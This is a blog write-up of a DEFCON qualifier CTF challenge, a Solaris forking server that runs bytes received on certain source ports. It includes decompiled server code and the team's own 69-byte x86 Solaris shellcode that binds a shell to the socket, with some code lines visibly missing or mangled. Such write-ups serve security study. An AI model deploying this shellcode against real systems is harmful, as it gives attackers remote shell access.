DEFCON quals 19 - Pwtent Pwanble 200 writup

Posted on Jun 6

Here’s how we solved the pp200 challenge, with the Shellphish team (by Manuel, Johannes, Don and I).

For this challenge, we were given an address/port and a file, which was a Solaris executable. Opened in IDA, the executable turned out to be a simple forking server. For each incoming TCP connection, if the source port is in the 5000-6000 range, 73 bytes are read and then executed (except the first byte). The child thread just executed this:

int __cdecl client_callback(int fd)
    void *v1; // esp@1
    uint16_t v2; // ax@3
    int v4; // [sp+0h] [bp-38h]@1
    int execute_buf; // [sp+Ch] [bp-2Ch]@1
    int *v6; // [sp+10h] [bp-28h]@1
    int v7; // [sp+14h] [bp-24h]@6
    void (*execute_the_buffer)(void); // [sp+18h] [bp-20h]@1
    socklen_t len; // [sp+1Ch] [bp-1Ch]@1
    struct sockaddr addr; // [sp+20h] [bp-18h]@1

    v6 = &v4;
    v1 = alloca(16 * ((unsigned int)(BUFSIZE + 30) >> 4));
    execute_buf = 16 * ((unsigned int)((char *)&execute_buf + 3) >> 4);
    execute_the_buffer = (void (*)(void))(16 * ((unsigned int)((char *)&execute_buf + 3) >> 4) + 1);
    len = 16;
    if ( getpeername(fd, &addr, &len) == -1 )
    v2 = ntohs(*(uint16_t *)&addr.sa_data[0]);
    printf("port: %d \n\n\n", v2);
    if ( ntohs(*(uint16_t *)&addr.sa_data[0]) > 0x1387u && ntohs(*(uint16_t *)&addr.sa_data[0]) <= 0x1770u )
    v7 = readAll(fd, execute_buf, BUFSIZE);
    printf("read %d bytes\n\n\n", v7);
    return 0;

So, we needed to send a shellcode shorter than 72 bytes. Unfortunately, Metasploit was of little help here, so we had to scout the web looking for suitable candidates. After several cases of it-work-on-our-VM-but-not-at-DDtek, we decided to roll our own.

Here it is: it spawns a shell using the TCP connection file descriptor as stdin, stdout and stderr.

#include <stdio.h>
#include <sys types.h>
#include <unistd.h>
#include <fcntl.h>

void f(void);
main(int argc, char **argv)
void f(void) 
            "nop \n"
            //dup 0 into 5
            "xor %edx, %edx \n"
            "xor %ebx, %ebx \n"
            "xor %edi, %edi \n"
            "xor %ecx, %ecx \n"
            "mov $9, %bl \n"
            "mov $62, %di \n"
            "mov $5, %cl \n"
            "push %edx \n"
            "push %ebx \n"
            "push %ecx \n"
            "push %edx \n"
            "mov %edi, %eax \n"
            "int $0x91 \n"
            //dup 1 into 5
            "push $1 \n"
            "push %ebx \n"
            "push %ecx \n"
            "push %edx \n"
            "mov %edi, %eax \n"
            "int $0x91 \n"
            //dup 2 into 5
            "push $2 \n"
            "push %ebx \n"
            "push %ecx \n"
            "push %edx \n"
            "mov %edi, %eax \n"
            "int $0x91 \n"
            //   //close stdin
            //   "push %edx \n"
            //   "push %edx \n"
            //   "incl %ecx \n"
            //   "mov %ecx, %eax \n"
            //   "int $0x91 \n"
            "xorl   %eax,%eax \n"
            "pushl  %eax \n"
            "pushl  $0x68732f6e \n"
            "pushl  $0x69622f2f \n"
            "movl   %esp,%ebx \n"
            "pushl  %eax \n"
            "pushl  %ebx \n"
            "movl   %esp,%edx \n"
            "pushl  %eax \n"
            "pushl  %edx \n"
            "pushl  %ebx \n"
            "movb   $0x3b,%al \n"
            "pushl  %eax \n"
            "int    $0x91 \n"

Total: 69 bytes (and 1 for padding).

Here’s the shellcode


That’s it. For my future reference, here’s the mapping between the familiar Debian commands and the OpenSolaris ones that were useful in the competition.

  • apt-cache search => pkg search
  • apt-get install => pkg install
  • strace => truss (strace didn’t appear to work)


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